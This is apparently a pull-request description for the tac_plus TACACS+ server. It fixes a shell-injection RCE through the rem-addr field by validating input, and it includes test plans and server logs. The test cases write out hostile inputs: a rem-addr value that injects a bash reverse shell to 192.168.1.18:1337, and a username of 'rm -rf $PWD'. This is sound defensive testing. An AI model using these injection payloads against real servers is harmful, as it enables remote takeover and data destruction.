[tacplus] add input validation for remote-addr field

[RollerMatic]

this diff fixes a RCE vulnerability within the tacplus code. The rem-addr field injectable through a tacacs client can be used to run a bash script on the host, under certain conditions a) the user config should have a before authorization directive, and a service should be specified. This fix treats rem-addr field to be a alphanumeric string, and it's values are generally IP addresses, hostnames, or vendor specific strings such as Local/Infinode. This fix will return value "unknown" if the rem-addr field consists of non alphanumeric characters. The treatment of this string is left to the remote system being called by tac_plus (to accept/reject)

Test plan ./configure --without-libwrap make LD_LIBRARY_PATH=.libs. libs/tac_plus ./tac_plus -G -d 5 -l /dev/stdout -p 4949 -C tac_plus.cfg

Outputs - Before ``` Mon May 22 17:26:00 2023 [1780828]: Before authorization call: /usr/local/sbin/tac_policy -- '$user' '$address' Mon May 22 17:26:00 2023 [1780828]: substitute: /usr/local/sbin/tac_policy -- '$user' '$address' Mon May 22 17:26:00 2023 [1780828]: Dollar substitution: /usr/local/sbin/tac_policy -- 'DEFAULT' 'asd';bash -i >& echo 'hello'' Mon May 22 17:26:00 2023 [1780828]: input service=exec ``` After ``` Mon May 22 17:28:14 2023 [1802525]: Before authorization call: /usr/local/sbin/tac_policy -- '$user' '$address' Mon May 22 17:28:14 2023 [1802525]: substitute: /usr/local/sbin/tac_policy -- '$user' '$address' Mon May 22 17:28:14 2023 [1802525]: invalid character=' Mon May 22 17:28:14 2023 [1802525]: Dollar substitution: /usr/local/sbin/tac_policy -- 'DEFAULT' 'unknown' Mon May 22 17:28:14 2023 [1802525]: input service=exec Mon May 22 17:28:14 2023 [1802525]: Error Error from program (66): "sh: line 1: /usr/local/sbin/tac_policy: No such file or directory " Mon May 22 17:28:14 2023 [1802525]: pid 1802527 child exited status 127 Mon May 22 17:28:14 2023 [1802525]: cmd /usr/local/sbin/tac_policy -- '$user' '$address' returns 127 (unrecognised value) Mon May 22 17:28:14 2023 [1802525]: authorization query for 'DEFAULT' tty0 from ::1 rejected ```

[RollerMatic]

Added some additional validations for other fields.

test plan

| ./configure --without-libwrap | make | ./tac_plus -G -d 20 -l /dev/stdout -p 2046 -C tac_plus.cfg

sample config file

❯ cat tac_plus.cfg
key = fooman

accounting file = /tmp/acct.log

user = DEFAULT {
before authorization "/home/sahuja4/tac_plus/sample.sh -- '$user' '$address'"
    service = exec {
        default attribute = permit
    }
}

The sample.sh file dumps all input args into a tmp file

❯ cat ../sample.sh
#!/bin/bash
echo $@ >> /tmp/vars.txt

What we want to check is that any arg inside the author_data struct that we cannot validate is set to unknown, and is passed on to the binary specified in pre/post authorization

We have 3 cases which we want to test Case 1: Invalid username

./debug -- --mode authz --username "rm -rf $PWD" --cmd "show run"

Case 2: Invalid rem-addr

./debug -- --mode authz --username "rm -rf $PWD" --cmd "show run" --rem-addr "asd';bash -i >& /dev/tcp/192.168.1.18/1337 0>&1 #"

Case 3: Correctly formatted username and rem-addr

./debug -- --mode authz --username sahuja4 --cmd "show run"

The following output was produced when run against the tacacs client invoked against the 3 cases

❯ cat /tmp/vars.txt
-- unknown devvm2737   <- case 1
-- sahuja4 unknown     <- case 2
-- sahuja4 devvm2737   <- case 3

Here is the server output when ran against the client

Tue Oct  3 15:33:28 2023 [2213901]: Reading config
Tue Oct  3 15:33:28 2023 [2213901]: Version F4.0.4.28-7fb Initialized 1
Tue Oct  3 15:33:28 2023 [2213901]: tac_plus server F4.0.4.28-7fb starting
Tue Oct  3 15:33:28 2023 [2213901]: socket FD 4 AF 10
Tue Oct  3 15:33:28 2023 [2213901]: Error Cannot write pid to /var/run/tac_plus.pid.2046 Permission denied
Tue Oct  3 15:33:28 2023 [2213901]: uid=189399 euid=189399 gid=100 egid=100 s=8000912
Tue Oct  3 15:33:32 2023 [2213901]: connection [1] from ::1 [::1]
Tue Oct  3 15:33:32 2023 [2213901]: forked 2214436
Tue Oct  3 15:33:32 2023 [2213901]: forked 2214436 for ::1, procs 1, procs for client 1
============================== case 1============================================
Tue Oct  3 15:33:32 2023 [2214436]: Authenticating ACLs for user 'DEFAULT' instead of 'rm -rf /home/sahuja4/fbsource/fbcode'
Tue Oct  3 15:33:32 2023 [2214436]: invalid character=[ ]
Tue Oct  3 15:33:32 2023 [2214436]: authorization query for 'rm -rf /home/sahuja4/fbsource/fbcode' tty0 from ::1 accepted
Tue Oct  3 15:33:32 2023 [2214436]: exit status=0
Tue Oct  3 15:33:32 2023 [2213901]: Clening up session for pid 2214436
Tue Oct  3 15:33:32 2023 [2213901]: Pid 2214436 Lowered Count for ::1 to 0
Tue Oct  3 15:34:52 2023 [2213901]: connection [1] from ::1 [::1]
Tue Oct  3 15:34:52 2023 [2213901]: forked 2234734
Tue Oct  3 15:34:52 2023 [2213901]: forked 2234734 for ::1, procs 1, procs for client 1
Tue Oct  3 15:34:52 2023 [2234734]: Authenticating ACLs for user 'DEFAULT' instead of 'sahuja4'
============================== case 2============================================
Tue Oct  3 15:34:52 2023 [2234734]: invalid character=[']
Tue Oct  3 15:34:52 2023 [2234734]: authorization query for 'sahuja4' tty0 from ::1 accepted <- case 2
Tue Oct  3 15:34:52 2023 [2234734]: exit status=0
Tue Oct  3 15:34:52 2023 [2213901]: Clening up session for pid 2234734
Tue Oct  3 15:34:52 2023 [2213901]: Pid 2234734 Lowered Count for ::1 to 0
Tue Oct  3 15:36:13 2023 [2213901]: connection [1] from ::1 [::1]
Tue Oct  3 15:36:13 2023 [2213901]: forked 2249661
Tue Oct  3 15:36:13 2023 [2213901]: forked 2249661 for ::1, procs 1, procs for client 1
============================== case 3============================================
Tue Oct  3 15:36:13 2023 [2249661]: Authenticating ACLs for user 'DEFAULT' instead of 'sahuja4'
Tue Oct  3 15:36:13 2023 [2249661]: authorization query for 'sahuja4' tty0 from ::1 accepted
Tue Oct  3 15:36:13 2023 [2249661]: exit status=0
Tue Oct  3 15:36:13 2023 [2213901]: Clening up session for pid 2249661
Tue Oct  3 15:36:13 2023 [2213901]: Pid 2249661 Lowered Count for ::1 to 0